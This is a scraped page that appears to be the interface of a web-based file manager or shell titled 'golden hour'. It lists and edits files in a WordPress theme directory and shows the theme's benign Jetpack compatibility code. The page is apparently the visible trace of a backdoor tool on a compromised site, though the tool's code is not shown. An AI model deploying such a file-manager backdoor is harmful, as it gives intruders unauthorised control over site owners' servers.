golden hour
/home/phakp/public_html/wp/wp-content/themes/zerif-lite/inc
⬆️ Go Up
Upload
File/Folder
Size
Actions
admin
-
Del
OK
class
-
Del
OK
customizer-info
-
Del
OK
customizer.php
77.43 KB
Del
OK
extras.php
836 B
Del
OK
hooks.php
12.13 KB
Del
OK
jetpack.php
423 B
Del
OK
template-tags.php
16.33 KB
Del
OK
Edit: jetpack.php
<?php /** * Jetpack Compatibility File * Add theme support for Infinite Scroll. * See: http://jetpack.me/support/infinite-scroll/ * * @package zerif-lite */ /** * Add theme support for Infinite Scroll. */ function zerif_jetpack_setup() { add_theme_support( 'infinite-scroll', array( 'container' => 'main', 'footer' => 'page', ) ); } add_action( 'after_setup_theme', 'zerif_jetpack_setup' );
Save